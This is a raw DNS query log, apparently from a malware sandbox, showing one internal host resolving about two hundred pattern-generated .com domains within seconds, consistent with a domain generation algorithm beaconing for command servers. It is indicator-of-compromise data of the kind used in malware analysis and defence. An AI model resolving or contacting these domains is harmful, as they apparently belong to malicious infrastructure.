Aug 23, 2024 18:47:39.930449009 CEST	192.168.2.4	1.1.1.1	0x252	Standard query (0)	gadypuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.931091070 CEST	192.168.2.4	1.1.1.1	0xd6b	Standard query (0)	lymyjon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.932106018 CEST	192.168.2.4	1.1.1.1	0x667f	Standard query (0)	volybec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.932811975 CEST	192.168.2.4	1.1.1.1	0xbb2e	Standard query (0)	qedytul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.933449030 CEST	192.168.2.4	1.1.1.1	0xd16e	Standard query (0)	pumyjig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.933892012 CEST	192.168.2.4	1.1.1.1	0x2489	Standard query (0)	galyvas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.934165955 CEST	192.168.2.4	1.1.1.1	0x7821	Standard query (0)	lysytyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.934484005 CEST	192.168.2.4	1.1.1.1	0xb9f4	Standard query (0)	qekyvav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.934928894 CEST	192.168.2.4	1.1.1.1	0xe87a	Standard query (0)	pupytyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.935065985 CEST	192.168.2.4	1.1.1.1	0x8503	Standard query (0)	ganyhuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.935616016 CEST	192.168.2.4	1.1.1.1	0xd7f5	Standard query (0)	vopyret.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.935616016 CEST	192.168.2.4	1.1.1.1	0x994b	Standard query (0)	lykyvod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.936150074 CEST	192.168.2.4	1.1.1.1	0x2577	Standard query (0)	pujycov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.936448097 CEST	192.168.2.4	1.1.1.1	0x2f01	Standard query (0)	gatyrez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.936556101 CEST	192.168.2.4	1.1.1.1	0xb6c6	Standard query (0)	lyvyguj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.936959028 CEST	192.168.2.4	1.1.1.1	0x41cc	Standard query (0)	vojycif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.936980963 CEST	192.168.2.4	1.1.1.1	0xb980	Standard query (0)	qetyrap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.937561989 CEST	192.168.2.4	1.1.1.1	0x721f	Standard query (0)	puvygyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.937653065 CEST	192.168.2.4	1.1.1.1	0x77e5	Standard query (0)	gahycib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.938122034 CEST	192.168.2.4	1.1.1.1	0xffad	Standard query (0)	lyrywax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.938429117 CEST	192.168.2.4	1.1.1.1	0x13ae	Standard query (0)	qegyxug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.938456059 CEST	192.168.2.4	1.1.1.1	0x4bfe	Standard query (0)	vocygyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.938992023 CEST	192.168.2.4	1.1.1.1	0x626b	Standard query (0)	purywop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.939346075 CEST	192.168.2.4	1.1.1.1	0x83f9	Standard query (0)	gacyfew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.939557076 CEST	192.168.2.4	1.1.1.1	0xdc6a	Standard query (0)	lygyxun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.942476034 CEST	192.168.2.4	1.1.1.1	0x1d1d	Standard query (0)	vowyqoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.944300890 CEST	192.168.2.4	1.1.1.1	0x3d9f	Standard query (0)	vonyjim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.944571018 CEST	192.168.2.4	1.1.1.1	0xb196	Standard query (0)	qexyfel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.944725037 CEST	192.168.2.4	1.1.1.1	0x8edd	Standard query (0)	pufyxug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945008039 CEST	192.168.2.4	1.1.1.1	0xcb57	Standard query (0)	gaqyqis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945166111 CEST	192.168.2.4	1.1.1.1	0xcb3d	Standard query (0)	lyxyfar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945319891 CEST	192.168.2.4	1.1.1.1	0x16fb	Standard query (0)	vofyzym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945471048 CEST	192.168.2.4	1.1.1.1	0xf049	Standard query (0)	qeqyqiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945636988 CEST	192.168.2.4	1.1.1.1	0xceb7	Standard query (0)	puzydal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945774078 CEST	192.168.2.4	1.1.1.1	0x24ce	Standard query (0)	gadyzyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.945954084 CEST	192.168.2.4	1.1.1.1	0xd5a6	Standard query (0)	lymymud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.946342945 CEST	192.168.2.4	1.1.1.1	0xa583	Standard query (0)	volydot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.946511030 CEST	192.168.2.4	1.1.1.1	0x554a	Standard query (0)	qedyleq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.946679115 CEST	192.168.2.4	1.1.1.1	0xc09	Standard query (0)	pumymuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.946830034 CEST	192.168.2.4	1.1.1.1	0x34ec	Standard query (0)	galydoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.946990967 CEST	192.168.2.4	1.1.1.1	0x3cda	Standard query (0)	qebyhuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.947978020 CEST	192.168.2.4	1.1.1.1	0x3794	Standard query (0)	lysylej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.948793888 CEST	192.168.2.4	1.1.1.1	0x1e5b	Standard query (0)	qekysip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.948828936 CEST	192.168.2.4	1.1.1.1	0xc5d2	Standard query (0)	pupylaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949029922 CEST	192.168.2.4	1.1.1.1	0xeb76	Standard query (0)	vonymuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949052095 CEST	192.168.2.4	1.1.1.1	0x34df	Standard query (0)	ganynyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949218035 CEST	192.168.2.4	1.1.1.1	0xf3e6	Standard query (0)	lykysix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949254036 CEST	192.168.2.4	1.1.1.1	0x1d50	Standard query (0)	vopykak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949395895 CEST	192.168.2.4	1.1.1.1	0xd4c6	Standard query (0)	qebynyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949456930 CEST	192.168.2.4	1.1.1.1	0x4759	Standard query (0)	pujypup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949573040 CEST	192.168.2.4	1.1.1.1	0x468d	Standard query (0)	gatykow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949636936 CEST	192.168.2.4	1.1.1.1	0xbcbc	Standard query (0)	lyvynen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949748039 CEST	192.168.2.4	1.1.1.1	0xbdcd	Standard query (0)	vojypuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949820995 CEST	192.168.2.4	1.1.1.1	0x2b08	Standard query (0)	qetykol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.949911118 CEST	192.168.2.4	1.1.1.1	0xd691	Standard query (0)	puvybeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.950181007 CEST	192.168.2.4	1.1.1.1	0x8677	Standard query (0)	gahypus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.950669050 CEST	192.168.2.4	1.1.1.1	0x663	Standard query (0)	lyryjir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.950850010 CEST	192.168.2.4	1.1.1.1	0x2410	Standard query (0)	vocybam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.951057911 CEST	192.168.2.4	1.1.1.1	0x99da	Standard query (0)	qegytyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.951260090 CEST	192.168.2.4	1.1.1.1	0x699	Standard query (0)	puryjil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.951673985 CEST	192.168.2.4	1.1.1.1	0xcf74	Standard query (0)	gacyvah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.155694008 CEST	192.168.2.4	1.1.1.1	0x999b	Standard query (0)	lygytyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.156353951 CEST	192.168.2.4	1.1.1.1	0x342a	Standard query (0)	vowyjut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.165714025 CEST	192.168.2.4	1.1.1.1	0x656	Standard query (0)	qexyvoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.167004108 CEST	192.168.2.4	1.1.1.1	0x7ee	Standard query (0)	pufytev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.168422937 CEST	192.168.2.4	1.1.1.1	0x965e	Standard query (0)	gaqyhuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.171806097 CEST	192.168.2.4	1.1.1.1	0x3b1f	Standard query (0)	lyxyvoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.172662973 CEST	192.168.2.4	1.1.1.1	0xb850	Standard query (0)	vofyref.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.173218012 CEST	192.168.2.4	1.1.1.1	0x98bd	Standard query (0)	qeqyhup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.173965931 CEST	192.168.2.4	1.1.1.1	0x6586	Standard query (0)	puzyciq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.175565958 CEST	192.168.2.4	1.1.1.1	0x88c	Standard query (0)	gadyrab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.176181078 CEST	192.168.2.4	1.1.1.1	0xcc10	Standard query (0)	lymygyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.176321983 CEST	192.168.2.4	1.1.1.1	0xbd36	Standard query (0)	volycik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.177565098 CEST	192.168.2.4	1.1.1.1	0xb300	Standard query (0)	qedyrag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.177896976 CEST	192.168.2.4	1.1.1.1	0x2483	Standard query (0)	pumygyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.178199053 CEST	192.168.2.4	1.1.1.1	0x435	Standard query (0)	lysywon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.178553104 CEST	192.168.2.4	1.1.1.1	0x6f7	Standard query (0)	vonygec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.178777933 CEST	192.168.2.4	1.1.1.1	0x36e	Standard query (0)	qekyxul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.179351091 CEST	192.168.2.4	1.1.1.1	0xc773	Standard query (0)	pupywog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.180473089 CEST	192.168.2.4	1.1.1.1	0xd6de	Standard query (0)	ganyfes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.180846930 CEST	192.168.2.4	1.1.1.1	0x8aad	Standard query (0)	lykyxur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.181025028 CEST	192.168.2.4	1.1.1.1	0xe955	Standard query (0)	gatyqih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.181205034 CEST	192.168.2.4	1.1.1.1	0xff3a	Standard query (0)	pujyxyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.184475899 CEST	192.168.2.4	1.1.1.1	0x3adf	Standard query (0)	vojyzyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.184670925 CEST	192.168.2.4	1.1.1.1	0xaacb	Standard query (0)	lyvyfad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.187319994 CEST	192.168.2.4	1.1.1.1	0xe56b	Standard query (0)	galycuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.187319994 CEST	192.168.2.4	1.1.1.1	0x37f5	Standard query (0)	vopyqim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.187510967 CEST	192.168.2.4	1.1.1.1	0xd8cb	Standard query (0)	qebyfav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.187558889 CEST	192.168.2.4	1.1.1.1	0xae74	Standard query (0)	qetyquq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.187697887 CEST	192.168.2.4	1.1.1.1	0x88e3	Standard query (0)	puvydov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.187782049 CEST	192.168.2.4	1.1.1.1	0x7608	Standard query (0)	gahyzez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.188126087 CEST	192.168.2.4	1.1.1.1	0x146b	Standard query (0)	lyrymuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.188357115 CEST	192.168.2.4	1.1.1.1	0x677a	Standard query (0)	vocydof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.188946009 CEST	192.168.2.4	1.1.1.1	0x483d	Standard query (0)	qegylep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.189030886 CEST	192.168.2.4	1.1.1.1	0x8043	Standard query (0)	purymuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.189486027 CEST	192.168.2.4	1.1.1.1	0xbf42	Standard query (0)	gacydib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.190572977 CEST	192.168.2.4	1.1.1.1	0xd1a1	Standard query (0)	lygylax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.190743923 CEST	192.168.2.4	1.1.1.1	0x561f	Standard query (0)	vowymyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.190790892 CEST	192.168.2.4	1.1.1.1	0xc10a	Standard query (0)	qexysig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.190978050 CEST	192.168.2.4	1.1.1.1	0x4ed6	Standard query (0)	gaqynyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.191057920 CEST	192.168.2.4	1.1.1.1	0x57a1	Standard query (0)	lyxysun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.191211939 CEST	192.168.2.4	1.1.1.1	0xe6d3	Standard query (0)	pufylap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.191421986 CEST	192.168.2.4	1.1.1.1	0x4ac1	Standard query (0)	vofykoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.191751957 CEST	192.168.2.4	1.1.1.1	0xa07e	Standard query (0)	gadykos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.191860914 CEST	192.168.2.4	1.1.1.1	0x440e	Standard query (0)	puzypug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.191921949 CEST	192.168.2.4	1.1.1.1	0x98cd	Standard query (0)	qeqynel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.192090988 CEST	192.168.2.4	1.1.1.1	0x4e26	Standard query (0)	lymyner.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.192162037 CEST	192.168.2.4	1.1.1.1	0xdef9	Standard query (0)	volypum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.192338943 CEST	192.168.2.4	1.1.1.1	0xaf16	Standard query (0)	pumybal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.192702055 CEST	192.168.2.4	1.1.1.1	0x3343	Standard query (0)	qedykiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.193083048 CEST	192.168.2.4	1.1.1.1	0xa9fb	Standard query (0)	galypyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.193694115 CEST	192.168.2.4	1.1.1.1	0x22b3	Standard query (0)	lysyjid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.194118023 CEST	192.168.2.4	1.1.1.1	0xa831	Standard query (0)	vonybat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.194315910 CEST	192.168.2.4	1.1.1.1	0xbc06	Standard query (0)	qekytyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.194863081 CEST	192.168.2.4	1.1.1.1	0x2d12	Standard query (0)	pupyjuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.195035934 CEST	192.168.2.4	1.1.1.1	0x8efb	Standard query (0)	ganyvoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.195194006 CEST	192.168.2.4	1.1.1.1	0x930f	Standard query (0)	lykytej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.195777893 CEST	192.168.2.4	1.1.1.1	0x508e	Standard query (0)	vopyjuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196145058 CEST	192.168.2.4	1.1.1.1	0x4758	Standard query (0)	qebyvop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196386099 CEST	192.168.2.4	1.1.1.1	0xf6a2	Standard query (0)	lyvyvix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196429968 CEST	192.168.2.4	1.1.1.1	0xfd40	Standard query (0)	pujyteq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196605921 CEST	192.168.2.4	1.1.1.1	0xf283	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196775913 CEST	192.168.2.4	1.1.1.1	0x3bc3	Standard query (0)	vojyrak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196830034 CEST	192.168.2.4	1.1.1.1	0xb8b1	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.196988106 CEST	192.168.2.4	1.1.1.1	0x8414	Standard query (0)	puvycip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.370776892 CEST	192.168.2.4	1.1.1.1	0x7133	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.608100891 CEST	192.168.2.4	1.1.1.1	0xc819	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.724631071 CEST	192.168.2.4	1.1.1.1	0xf9d5	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.725372076 CEST	192.168.2.4	1.1.1.1	0x2193	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.726074934 CEST	192.168.2.4	1.1.1.1	0x6096	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.726615906 CEST	192.168.2.4	1.1.1.1	0x90de	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.727207899 CEST	192.168.2.4	1.1.1.1	0xa9e3	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.727890968 CEST	192.168.2.4	1.1.1.1	0xb943	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.728807926 CEST	192.168.2.4	1.1.1.1	0x39f5	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.728872061 CEST	192.168.2.4	1.1.1.1	0x8400	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.729696989 CEST	192.168.2.4	1.1.1.1	0x5d45	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.730046988 CEST	192.168.2.4	1.1.1.1	0x49e	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.735950947 CEST	192.168.2.4	1.1.1.1	0x2ecc	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.736366987 CEST	192.168.2.4	1.1.1.1	0x7016	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.736426115 CEST	192.168.2.4	1.1.1.1	0x412	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.736839056 CEST	192.168.2.4	1.1.1.1	0x7c08	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.737068892 CEST	192.168.2.4	1.1.1.1	0x499b	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.737737894 CEST	192.168.2.4	1.1.1.1	0xbcf6	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.737737894 CEST	192.168.2.4	1.1.1.1	0x28e	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.738075972 CEST	192.168.2.4	1.1.1.1	0x73af	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.738218069 CEST	192.168.2.4	1.1.1.1	0xfe05	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.738323927 CEST	192.168.2.4	1.1.1.1	0xe683	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.738677025 CEST	192.168.2.4	1.1.1.1	0x41ae	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.739077091 CEST	192.168.2.4	1.1.1.1	0xe224	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.739195108 CEST	192.168.2.4	1.1.1.1	0x1c06	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.739671946 CEST	192.168.2.4	1.1.1.1	0x9a93	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.739783049 CEST	192.168.2.4	1.1.1.1	0xd37c	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.740129948 CEST	192.168.2.4	1.1.1.1	0x5c42	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.740533113 CEST	192.168.2.4	1.1.1.1	0xa227	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.740734100 CEST	192.168.2.4	1.1.1.1	0xbe70	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.741193056 CEST	192.168.2.4	1.1.1.1	0x686e	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.741571903 CEST	192.168.2.4	1.1.1.1	0xd4b1	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.741571903 CEST	192.168.2.4	1.1.1.1	0xa935	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.742387056 CEST	192.168.2.4	1.1.1.1	0x67d2	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.742387056 CEST	192.168.2.4	1.1.1.1	0xfa36	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.742476940 CEST	192.168.2.4	1.1.1.1	0xcbcb	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.742952108 CEST	192.168.2.4	1.1.1.1	0x7cad	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.743024111 CEST	192.168.2.4	1.1.1.1	0x1931	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.743551970 CEST	192.168.2.4	1.1.1.1	0x3ff2	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.743551970 CEST	192.168.2.4	1.1.1.1	0xa09b	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.744327068 CEST	192.168.2.4	1.1.1.1	0x9302	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.744425058 CEST	192.168.2.4	1.1.1.1	0x97cc	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.745156050 CEST	192.168.2.4	1.1.1.1	0x4cad	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.745532036 CEST	192.168.2.4	1.1.1.1	0x3687	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.745743036 CEST	192.168.2.4	1.1.1.1	0xffc5	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.745743036 CEST	192.168.2.4	1.1.1.1	0xd3c8	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.746175051 CEST	192.168.2.4	1.1.1.1	0xa503	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.746175051 CEST	192.168.2.4	1.1.1.1	0x80d7	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.746678114 CEST	192.168.2.4	1.1.1.1	0x7d0f	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.746757030 CEST	192.168.2.4	1.1.1.1	0xd595	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.746877909 CEST	192.168.2.4	1.1.1.1	0x338e	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.747117996 CEST	192.168.2.4	1.1.1.1	0xf93c	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.747737885 CEST	192.168.2.4	1.1.1.1	0x7a7a	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.747891903 CEST	192.168.2.4	1.1.1.1	0x1b2f	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.748579979 CEST	192.168.2.4	1.1.1.1	0x8205	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.748658895 CEST	192.168.2.4	1.1.1.1	0x2636	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.749119997 CEST	192.168.2.4	1.1.1.1	0x51c2	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.749411106 CEST	192.168.2.4	1.1.1.1	0x997c	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.750103951 CEST	192.168.2.4	1.1.1.1	0xc3b9	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.750451088 CEST	192.168.2.4	1.1.1.1	0xd87f	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.750451088 CEST	192.168.2.4	1.1.1.1	0x605d	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.750873089 CEST	192.168.2.4	1.1.1.1	0x1952	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.751652002 CEST	192.168.2.4	1.1.1.1	0x6385	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
